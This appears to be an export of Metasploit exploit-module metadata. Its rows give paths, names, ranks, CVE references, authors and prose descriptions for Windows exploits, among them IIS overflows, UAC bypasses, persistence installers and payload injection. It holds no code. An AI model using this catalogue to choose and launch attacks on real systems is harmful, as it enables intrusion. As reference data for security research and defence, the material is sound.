889,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/isapi/ms00_094_pbserver.rb","exploit","windows/isapi/ms00_094_pbserver","exploit/windows/isapi/ms00_094_pbserver","Microsoft IIS Phone Book Service Overflow",400,"This is an exploit for the Phone Book Service /pbserver/pbserver.dll described in MS00-094. By sending an overly long URL argument for phone book updates, it is possible to overwrite the stack. 
This module has only been tested against Windows 2000 SP1.","Metasploit Framework License (BSD)","f","2000-12-04 00:00:00",0,,"aggressive","t","BID-2048, CVE-2000-1089, MSB-MS00-094, OSVDB-463","patrick " 890,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb","exploit","windows/isapi/ms03_022_nsiislog_post","exploit/windows/isapi/ms03_022_nsiislog_post","Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow",400,"This exploits a buffer overflow found in the nsiislog.dll ISAPI filter that comes with Windows Media Server. This module will also work against the 'patched' MS03-019 version. This vulnerability was addressed by MS03-022.","Metasploit Framework License (BSD)","f","2003-06-25 00:00:00",0,,"aggressive","t","BID-8035, CVE-2003-0349, MSB-MS03-022, OSVDB-4535, URL-http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html","hdm " 891,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb","exploit","windows/isapi/ms03_051_fp30reg_chunked","exploit/windows/isapi/ms03_051_fp30reg_chunked","Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow",400,"This is an exploit for the chunked encoding buffer overflow described in MS03-051 and originally reported by Brett Moore. This particular module works against versions of Windows 2000 between SP0 and SP3. Service Pack 4 fixes the issue.","Metasploit Framework License (BSD)","f","2003-11-11 00:00:00",0,,"aggressive","t","BID-9007, CVE-2003-0822, MSB-MS03-051, OSVDB-2952","hdm " 892,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/isapi/rsa_webagent_redirect.rb","exploit","windows/isapi/rsa_webagent_redirect","exploit/windows/isapi/rsa_webagent_redirect","Microsoft IIS ISAPI RSA WebAgent Redirect Overflow",400,"This module exploits a stack buffer overflow in the SecurID Web Agent for IIS. 
This ISAPI filter runs in-process with inetinfo.exe, so any attempt to exploit this flaw will result in the termination and potential restart of the IIS service.","Metasploit Framework License (BSD)","f","2005-10-21 00:00:00",0,,"aggressive","t","CVE-2005-4734, OSVDB-20151","hdm " 893,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/isapi/w3who_query.rb","exploit","windows/isapi/w3who_query","exploit/windows/isapi/w3who_query","Microsoft IIS ISAPI w3who.dll Query String Overflow",400,"This module exploits a stack buffer overflow in the w3who.dll ISAPI application. This vulnerability was discovered by Nicolas Gregoire, and this code has been successfully tested against Windows 2000 and Windows XP (SP2). When exploiting Windows XP, the payload must call RevertToSelf before it will be able to spawn a command shell.","Metasploit Framework License (BSD)","f","2004-12-06 00:00:00",0,,"aggressive","t","BID-11820, CVE-2004-1134, OSVDB-12258, URL-http://www.exaprobe.com/labs/advisories/esa-2004-1206.html","hdm " 894,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ldap/imail_thc.rb","exploit","windows/ldap/imail_thc","exploit/windows/ldap/imail_thc","IMail LDAP Service Buffer Overflow",200,"This exploits a buffer overflow in the LDAP service that is part of the IMail product. This module was tested against version 7.10 and 8.5, both running on Windows 2000.","Metasploit Framework License (BSD)","f","2004-02-17 00:00:00",0,,"aggressive","t","BID-9682, CVE-2004-0297, OSVDB-3984, URL-http://secunia.com/advisories/10880/","hdm " 895,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/ldap/pgp_keyserver7.rb","exploit","windows/ldap/pgp_keyserver7","exploit/windows/ldap/pgp_keyserver7","Network Associates PGP KeyServer 7 LDAP Buffer Overflow",400,"This module exploits a stack buffer overflow in the LDAP service that is part of the NAI PGP Enterprise product suite. 
This module was tested against PGP KeyServer v7.0. Due to space restrictions, egghunter is used to find our payload - therefore you may wish to adjust WfsDelay.","Metasploit Framework License (BSD)","t","2001-07-16 00:00:00",0,,"aggressive","t","BID-3046, CVE-2001-1320, OSVDB-4742, URL-http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/","patrick " 896,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/license/calicclnt_getconfig.rb","exploit","windows/license/calicclnt_getconfig","exploit/windows/license/calicclnt_getconfig","Computer Associates License Client GETCONFIG Overflow",200,"This module exploits a vulnerability in the CA License Client service. This exploit will only work if your IP address can be resolved from the target system's point of view. This can be accomplished on a local network by running the 'nmbd' service that comes with Samba. If you are running this exploit from Windows and do not filter udp port 137, this should not be a problem (if the target is on the same network segment). Due to the bugginess of the software, you are only allowed one connection to the agent port before it starts ignoring you. If it wasn't for this issue, it would be possible to repeatedly exploit this bug.","Metasploit Framework License (BSD)","t","2005-03-02 00:00:00",,,"aggressive","t","BID-12705, CVE-2005-0581, OSVDB-14389, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213","hdm , patrick " 897,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/license/calicserv_getconfig.rb","exploit","windows/license/calicserv_getconfig","exploit/windows/license/calicserv_getconfig","Computer Associates License Server GETCONFIG Overflow",300,"This module exploits a vulnerability in the CA License Server network service. 
By sending an excessively long GETCONFIG packet the stack may be overwritten.","Metasploit Framework License (BSD)","t","2005-03-02 00:00:00",,,"aggressive","t","BID-12705, CVE-2005-0581, OSVDB-14389, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213","hdm , patrick " 898,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/license/flexnet_lmgrd_bof.rb","exploit","windows/license/flexnet_lmgrd_bof","exploit/windows/license/flexnet_lmgrd_bof","FlexNet License Server Manager lmgrd Buffer Overflow",300,"This module exploits a vulnerability in the FlexNet License Server Manager. The vulnerability is due to the insecure usage of memcpy in the lmgrd service when handling network packets, which results in a stack buffer overflow. In order to improve reliability, this module will make lots of connections to lmgrd during each attempt to maximize its success.","Metasploit Framework License (BSD)","t","2012-03-23 00:00:00",1,,"aggressive","t","BID-52718, OSVDB-81899, URL-http://aluigi.altervista.org/adv/lmgrd_1-adv.txt, URL-http://www.flexerasoftware.com/pl/13057.htm, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-052/","Alexander Gavrun, Luigi Auriemma, juan vazquez , sinn3r " 899,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/license/sentinel_lm7_udp.rb","exploit","windows/license/sentinel_lm7_udp","exploit/windows/license/sentinel_lm7_udp","SentinelLM UDP Buffer Overflow",200,"This module exploits a simple stack buffer overflow in the Sentinel License Manager. The SentinelLM service is installed with a wide selection of products and seems particularly popular with academic products. 
If the wrong target value is selected, the service will crash and not restart.","Metasploit Framework License (BSD)","t","2005-03-07 00:00:00",,,"aggressive","t","BID-12742, CVE-2005-0353, OSVDB-14605","hdm " 900,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb","exploit","windows/local/adobe_sandbox_adobecollabsync","exploit/windows/local/adobe_sandbox_adobecollabsync","AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass",500,"This module exploits a vulnerability on Adobe Reader X Sandbox. The vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe process to write register values which can be used to trigger a buffer overflow on the AdobeCollabSync component, allowing to achieve Medium Integrity Level privileges from a Low Integrity AcroRd32.exe process. This module has been tested successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.","Metasploit Framework License (BSD)","f","2013-05-14 00:00:00",0,,"aggressive","t","CVE-2013-2730, OSVDB-93355, URL-http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html","Felipe Andres Manzano, juan vazquez " 901,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/always_install_elevated.rb","exploit","windows/local/always_install_elevated","exploit/windows/local/always_install_elevated","Windows AlwaysInstallElevated MSI",200,"This module checks the AlwaysInstallElevated registry keys which dictate if .MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM). The default MSI file is data/exploits/exec_payload.msi with the WiX source file under external/source/exploits/exec_payload_msi/exec_payload.wxs. This MSI simply executes payload.exe within the same folder. The MSI may not execute successfully on successive runs, but it may be possible to get around this by regenerating the MSI. 
MSI can be rebuilt from the source using the WIX tool with the following commands: candle exec_payload.wxs light exec_payload.wixobj","Metasploit Framework License (BSD)","f","2010-03-18 00:00:00",0,,"aggressive","t","URL-http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx, URL-http://wix.sourceforge.net, URL-http://www.greyhathacker.net/?p=185","Ben Campbell, Parvez Anwar" 902,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/ask.rb","exploit","windows/local/ask","exploit/windows/local/ask","Windows Escalate UAC Execute RunAs",600,"This module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings.","Metasploit Framework License (BSD)","f","2012-01-03 00:00:00",0,,"aggressive","t","URL-http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html","mubix " 903,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/bypassuac.rb","exploit","windows/local/bypassuac","exploit/windows/local/bypassuac","Windows Escalate UAC Protection Bypass",600,"This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.","Metasploit Framework License (BSD)","f","2010-12-31 00:00:00",0,,"aggressive","t","URL-http://www.trustedsec.com/december-2010/bypass-windows-uac/","David Kennedy ""ReL1K"" , mitnick, mubix " 904,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/current_user_psexec.rb","exploit","windows/local/current_user_psexec","exploit/windows/local/current_user_psexec","PsExec via Current User Token",600,"This module uploads an executable file to the victim system, creates a share containing that executable, creates a remote service on each target system using a UNC path to that file, and finally starts the service(s). 
The result is similar to psexec but with the added benefit of using the session's current authentication token instead of having to know a password or hash.","Metasploit Framework License (BSD)","f","1999-01-01 00:00:00",0,,"aggressive","t","CVE-1999-0504, OSVDB-3106, URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx","egypt , jabra" 905,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/ms10_092_schelevator.rb","exploit","windows/local/ms10_092_schelevator","exploit/windows/local/ms10_092_schelevator","Windows Escalate Task Scheduler XML Privilege Escalation",600,"This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, in a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges. NOTE: Thanks to webDEViL for the information about disable/enable.","Metasploit Framework License (BSD)","f","2010-09-13 00:00:00",0,,"aggressive","t","BID-44357, CVE-2010-3338, EDB-15589, MSB-MS10-092, OSVDB-68518","jduck " 906,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb","exploit","windows/local/ms11_080_afdjoinleaf","exploit/windows/local/ms11_080_afdjoinleaf","MS11-080 AfdJoinLeaf Privilege Escalation",200,"This module exploits a flaw in the AfdJoinLeaf function of the afd.sys driver to overwrite data in kernel space. An address within the HalDispatchTable is overwritten and when triggered with a call to NtQueryIntervalProfile will execute shellcode. 
This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process before restoring its own token to avoid causing system instability.","Metasploit Framework License (BSD)","f","2011-11-30 00:00:00",0,,"aggressive","t","CVE-2011-2005, EDB-18176, MSB-MS11-080, URL-http://www.offensive-security.com/vulndev/ms11-080-voyage-into-ring-zero/","Matteo Memelli, Spencer McIntyre" 907,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/payload_inject.rb","exploit","windows/local/payload_inject","exploit/windows/local/payload_inject","Windows Manage Memory Payload Injection",600,"This module will inject a payload into memory of a process. If a payload isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID datastore option isn't specified, then it'll inject into notepad.exe instead.","Metasploit Framework License (BSD)","f","2011-10-12 00:00:00",0,,"aggressive","t",,"Carlos Perez , sinn3r " 908,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/persistence.rb","exploit","windows/local/persistence","exploit/windows/local/persistence","Windows Manage Persistent Payload Installer",600,"This Module will create a boot persistent reverse Meterpreter session by installing on the target host the payload as a script that will be executed at user logon or system startup depending on privilege and selected startup method.","Metasploit Framework License (BSD)","f","2011-10-19 00:00:00",0,,"aggressive","t",,"Carlos Perez " 909,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/s4u_persistence.rb","exploit","windows/local/s4u_persistence","exploit/windows/local/s4u_persistence","Windows Manage User Level Persistent Payload Installer",600,"Creates a scheduled task that will run using service-for-user (S4U). This allows the scheduled task to run even as an unprivileged user that is not logged into the device. 
This will result in a lower security context, allowing access to local resources only. The module requires 'Logon as a batch job' permissions (SeBatchLogonRight).","Metasploit Framework License (BSD)","f","2013-01-02 00:00:00",0,,"aggressive","t","URL-http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/, URL-http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/","Brandon McCann ""zeknox"" , Thomas McCarthy ""smilingraccoon"" " 910,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/service_permissions.rb","exploit","windows/local/service_permissions","exploit/windows/local/service_permissions","Windows Escalate Service Permissions Local Privilege Escalation",500,"This module attempts to exploit existing administrative privileges to obtain a SYSTEM session. If directly creating a service fails, this module will inspect existing services to look for insecure file or configuration permissions that may be hijacked. It will then attempt to restart the replaced service to run the payload. This will result in a new session when this succeeds. If the module is able to modify the service but does not have permission to start and stop the affected service, the attacker must wait for the system to restart before a session will be created.","Metasploit Framework License (BSD)","f","2012-10-15 00:00:00",0,,"aggressive","t",,"scriptjunkie" 911,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/local/trusted_service_path.rb","exploit","windows/local/trusted_service_path","exploit/windows/local/trusted_service_path","Windows Service Trusted Path Privilege Escalation",600,"This module exploits a logic flaw due to how the lpApplicationName parameter is handled. When the lpApplicationName contains a space, the file name is ambiguous. 
Take this file path as an example: C:\program files\hello.exe; The Windows API will try to interpret this as two possible paths: C:\program.exe, and C:\program files\hello.exe, and then execute all of them. To some software developers, this is an unexpected behavior, which becomes a security problem if an attacker is able to place a malicious executable in one of these unexpected paths, sometimes escalating privileges if run as SYSTEM. Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the same problem. The offensive technique is also described in Writing Secure Code (2nd Edition), Chapter 23, in the section ""Calling Processes Security"" on page 676.","Metasploit Framework License (BSD)","f","2001-10-25 00:00:00",0,,"aggressive","t","URL-http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx, URL-http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us","sinn3r " 912,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/lotus/domino_http_accept_language.rb","exploit","windows/lotus/domino_http_accept_language","exploit/windows/lotus/domino_http_accept_language","IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow",200,"This module exploits a stack buffer overflow in IBM Lotus Domino Web Server prior to version 7.0.3FP1 and 8.0.1. 
This flaw is triggered by any HTTP request with an Accept-Language header greater than 114 bytes.","Metasploit Framework License (BSD)","t","2008-05-20 00:00:00",,,"aggressive","t","BID-29310, CVE-2008-2240, OSVDB-45415, URL-http://www-01.ibm.com/support/docview.wss?uid=swg21303057","Earl Marcus klks , Fairuzan Roslan " 913,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/lotus/domino_icalendar_organizer.rb","exploit","windows/lotus/domino_icalendar_organizer","exploit/windows/lotus/domino_icalendar_organizer","IBM Lotus Domino iCalendar MAILTO Buffer Overflow",300,"This module exploits a vulnerability found in IBM Lotus Domino iCalendar. By sending a long string of data as the ""ORGANIZER;mailto"" header, process ""nRouter.exe"" crashes due to a Cstrcpy() routine in nnotes.dll, which allows remote attackers to gain arbitrary code execution. Note: In order to trigger the vulnerable code path, a valid Domino mailbox account is needed.","Metasploit Framework License (BSD)","f","2010-09-14 00:00:00",2,,"aggressive","t","CVE-2010-3407, OSVDB-68040, URL-http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/, URL-http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-177/","A. Plaskett, sinn3r " 914,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/lotus/domino_sametime_stmux.rb","exploit","windows/lotus/domino_sametime_stmux","exploit/windows/lotus/domino_sametime_stmux","IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow",200,"This module exploits a stack buffer overflow in Lotus Domino's Sametime Server. By sending an overly long POST request to the Multiplexer STMux.exe service we are able to overwrite SEH. 
Based on the exploit by Manuel Santamarina Suarez.","Metasploit Framework License (BSD)","t","2008-05-21 00:00:00",1,,"aggressive","t","BID-29328, CVE-2008-2499, OSVDB-45610, URL-http://www.zerodayinitiative.com/advisories/ZDI-08-028/","patrick , riaf " 915,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/lotus/lotusnotes_lzh.rb","exploit","windows/lotus/lotusnotes_lzh","exploit/windows/lotus/lotusnotes_lzh","Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)",300,"This module exploits a stack buffer overflow in Lotus Notes 8.5.2 when parsing a malformed, specially crafted LZH file. This vulnerability was discovered by binaryhouse.net","Metasploit Framework License (BSD)","f","2011-05-24 00:00:00",0,,"passive","t","BID-48018, CVE-2011-1213, OSVDB-72706, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=904, URL-http://www.ibm.com/support/docview.wss?uid=swg21500034","alino <26alino@gmail.com>, binaryhouse.net" 916,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/lpd/hummingbird_exceed.rb","exploit","windows/lpd/hummingbird_exceed","exploit/windows/lpd/hummingbird_exceed","Hummingbird Connectivity 10 SP5 LPD Buffer Overflow",200,"This module exploits a stack buffer overflow in Hummingbird Connectivity 10 LPD Daemon. This module has only been tested against Hummingbird Exceed v10 with SP5.","Metasploit Framework License (BSD)","t","2005-05-27 00:00:00",,,"aggressive","t","BID-13788, CVE-2005-1815, OSVDB-16957","MC " 917,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/lpd/niprint.rb","exploit","windows/lpd/niprint","exploit/windows/lpd/niprint","NIPrint LPD Request Overflow",400,"This module exploits a stack buffer overflow in the Network Instrument NIPrint LPD service. 
Inspired by Immunity's VisualSploit :-)","Metasploit Framework License (BSD)","f","2003-11-05 00:00:00",0,,"aggressive","t","BID-8968, CVE-2003-1141, OSVDB-2774, URL-http://www.immunitysec.com/documentation/vs_niprint.html","hdm " 918,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/lpd/saplpd.rb","exploit","windows/lpd/saplpd","exploit/windows/lpd/saplpd","SAP SAPLPD 6.28 Buffer Overflow",400,"This module exploits a stack buffer overflow in SAPlpd 6.28 (SAP Release 6.40). By sending an overly long argument, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2008-02-04 00:00:00",0,,"aggressive","t","BID-27613, CVE-2008-0621, OSVDB-41127","MC " 919,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/lpd/wincomlpd_admin.rb","exploit","windows/lpd/wincomlpd_admin","exploit/windows/lpd/wincomlpd_admin","WinComLPD <= 3.0.2 Buffer Overflow",400,"This module exploits a stack buffer overflow in WinComLPD <= 3.0.2. By sending an overly long authentication packet to the remote administration service, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2008-02-04 00:00:00",0,,"aggressive","t","BID-27614, CVE-2008-5159, OSVDB-42861","MC " 920,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/actfax_raw_server_bof.rb","exploit","windows/misc/actfax_raw_server_bof","exploit/windows/misc/actfax_raw_server_bof","ActFax 5.01 RAW Server Buffer Overflow",300,"This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW Server can be used to transfer fax messages without any underlying protocols. To note significant fields in the fax being transferred, like the fax number or the recipient, ActFax data fields can be used. This module exploits a buffer overflow in the handling of the @F506 fields due to the insecure usage of strcpy. 
This module has been tested successfully on ActFax 5.01 over Windows XP SP3 (English).","Metasploit Framework License (BSD)","f","2013-02-05 00:00:00",0,,"aggressive","t","BID-57789, EDB-24467, OSVDB-89944, URL-http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html","Craig Freyman, corelanc0d3r, juan vazquez " 921,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/agentxpp_receive_agentx.rb","exploit","windows/misc/agentxpp_receive_agentx","exploit/windows/misc/agentxpp_receive_agentx","AgentX++ Master AgentX::receive_agentx Stack Buffer Overflow",400,"This exploits a stack buffer overflow in the AgentX++ library, as used by various applications. By sending a specially crafted request, an attacker can execute arbitrary code, potentially with SYSTEM privileges. This module was tested successfully against master.exe as included with Real Network's Helix Server v12. When installed as a service with Helix Server, the service runs as SYSTEM, has no recovery action, but will start automatically on boot. This module does not work with NX/XD enabled but could be modified easily to do so. The address","Metasploit Framework License (BSD)","t","2010-04-16 00:00:00",0,,"aggressive","t","CVE-2010-1318, OSVDB-63919, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=867","jduck " 922,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/allmediaserver_bof.rb","exploit","windows/misc/allmediaserver_bof","exploit/windows/misc/allmediaserver_bof","ALLMediaServer 0.8 Buffer Overflow",300,"This module exploits a stack buffer overflow in ALLMediaServer 0.8. The vulnerability is caused due to a boundary error within the handling of HTTP requests. While the exploit supports DEP bypass via ROP, on Windows 7 the stack pivoting isn't reliable across virtual (VMWare, VirtualBox) and physical environments. 
Because of this the module isn't using DEP bypass on the Windows 7 SP1 target, where by default DEP is OptIn and AllMediaServer won't run with DEP.","Metasploit Framework License (BSD)","f","2012-07-04 00:00:00",1,,"aggressive","t","EDB-19625","juan vazquez , modpr0be , motaz reda " 923,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb","exploit","windows/misc/apple_quicktime_rtsp_response","exploit/windows/misc/apple_quicktime_rtsp_response","Apple QuickTime 7.3 RTSP Response Header Buffer Overflow",300,"This module exploits a stack buffer overflow in Apple QuickTime 7.3. By sending an overly long RTSP response to a client, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","f","2007-11-23 00:00:00",0,,"passive","t","BID-26549, CVE-2007-6166, EDB-4648, OSVDB-40876","MC " 924,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb","exploit","windows/misc/asus_dpcproxy_overflow","exploit/windows/misc/asus_dpcproxy_overflow","Asus Dpcproxy Buffer Overflow",200,"This module exploits a stack buffer overflow in Asus Dpcproxy version 2.0.0.19. It should be vulnerable until version 2.0.0.24. Credit to Luigi Auriemma","Metasploit Framework License (BSD)","t","2008-03-21 00:00:00",0,,"aggressive","t","BID-28394, CVE-2008-1491, OSVDB-43638","Jacopo Cervini" 925,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb","exploit","windows/misc/avaya_winpmd_unihostrouter","exploit/windows/misc/avaya_winpmd_unihostrouter","Avaya WinPMD UniteHostRouter Buffer Overflow",300,"This module exploits a stack buffer overflow in Avaya WinPMD. The vulnerability exists in the UniteHostRouter service, due to the insecure usage of memcpy when parsing specially crafted ""To:"" headers. 
The module has been tested successfully on Avaya WinPMD 3.8.2 over Windows XP SP3 and Windows 2003 SP2.","Metasploit Framework License (BSD)","t","2011-05-23 00:00:00",0,,"aggressive","t","BID-47947, EDB-18397, OSVDB-73269, OSVDB-82764, URL-http://secunia.com/advisories/44062, URL-https://downloads.avaya.com/css/P8/documents/100140122","Abdul-Aziz Hariri, Abysssec, juan vazquez " 926,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/avidphoneticindexer.rb","exploit","windows/misc/avidphoneticindexer","exploit/windows/misc/avidphoneticindexer","Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow",300,"This module exploits a stack buffer overflow in process AvidPhoneticIndexer.exe (port 4659), which comes as part of the Avid Media Composer 5.5 Editing Suite. This daemon sometimes starts on a different port; if you start it standalone it will run on port 4660.","Metasploit Framework License (BSD)","f","2011-11-29 00:00:00",0,,"aggressive","t","CVE-2011-5003, OSVDB-77376, URL-http://www.security-assessment.com/files/documents/advisory/Avid_Media_Composer-Phonetic_Indexer-Remote_Stack_Buffer_Overflow.pdf","vt [nick.freeman " 927,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/bakbone_netvault_heap.rb","exploit","windows/misc/bakbone_netvault_heap","exploit/windows/misc/bakbone_netvault_heap","BakBone NetVault Remote Heap Overflow",200,"This module exploits a heap overflow in the BakBone NetVault Process Manager service. 
This code is a direct port of the netvault.c code written by nolimit and BuzzDee.","Metasploit Framework License (BSD)","f","2005-04-01 00:00:00",,,"aggressive","t","BID-12967, CVE-2005-1009, OSVDB-15234","hdm , nolimit.bugtraq " 928,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/bcaaa_bof.rb","exploit","windows/misc/bcaaa_bof","exploit/windows/misc/bcaaa_bof","Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow",400,"This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102), which comes as part of the Blue Coat Authentication proxy. Please note that by default, this exploit will attempt up to three times in order to successfully gain remote code execution (in some cases, it takes as many as five times). This can cause your activity to look even more suspicious. To modify the number of exploit attempts, set the ATTEMPTS option.","Metasploit Framework License (BSD)","f","2011-04-04 00:00:00",0,,"aggressive","t","CVE-2011-5124, OSVDB-72095, URL-http://seclists.org/bugtraq/2011/Jul/44, URL-https://kb.bluecoat.com/index?page=content&id=SA55","Paul Harrington, Travis Warren, sinn3r " 929,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/bigant_server.rb","exploit","windows/misc/bigant_server","exploit/windows/misc/bigant_server","BigAnt Server 2.2 Buffer Overflow",200,"This module exploits a stack buffer overflow in BigAnt Server 2.2. 
By sending a specially crafted packet, an attacker may be able to execute arbitrary code.","Metasploit Framework License (BSD)","t","2008-04-15 00:00:00",0,,"aggressive","t","BID-28795, CVE-2008-1914, OSVDB-44454","MC " 930,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/bigant_server_250.rb","exploit","windows/misc/bigant_server_250","exploit/windows/misc/bigant_server_250","BigAnt Server 2.50 SP1 Buffer Overflow",500,"This exploits a stack buffer overflow in the BigAnt Messaging Service, part of the BigAnt Server product suite. This module was tested successfully against version 2.50 SP1.","Metasploit Framework License (BSD)","t","2008-04-15 00:00:00",0,,"aggressive","t","CVE-2008-1914, EDB-9673, EDB-9690, OSVDB-44454","Dr_IDE " 931,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/bigant_server_dupf_upload.rb","exploit","windows/misc/bigant_server_dupf_upload","exploit/windows/misc/bigant_server_dupf_upload","BigAnt Server DUPF Command Arbitrary File Upload",600,"This exploits an arbitrary file upload vulnerability in BigAnt Server 2.97 SP7. A lack of authentication allows unauthenticated file uploads through a DUPF command. Additionally, the filename option in the same command can be used to launch a directory traversal attack and achieve arbitrary file upload. The module uses the Windows Management Instrumentation service to execute an arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. 
It has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003 SP2.","Metasploit Framework License (BSD)","t","2013-01-09 00:00:00",0,,"aggressive","t","BID-57214, CVE-2012-6274, OSVDB-89342, US-CERT-VU-990652","Hamburgers Maccoy, juan vazquez " 932,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb","exploit","windows/misc/bigant_server_sch_dupf_bof","exploit/windows/misc/bigant_server_sch_dupf_bof","BigAnt Server 2 SCH And DUPF Buffer Overflow",300,"This exploits a stack buffer overflow in BigAnt Server 2.97 SP7. The vulnerability is due to the dangerous usage of strcpy while handling errors. This module uses a combination of SCH and DUPF request to trigger the vulnerability, and has been tested successfully against version 2.97 SP7 over Windows XP SP3 and Windows 2003 SP2.","Metasploit Framework License (BSD)","t","2013-01-09 00:00:00",0,,"aggressive","t","BID-57214, CVE-2012-6275, OSVDB-89344, US-CERT-VU-990652","Hamburgers Maccoy, juan vazquez " 933,"2013-05-07 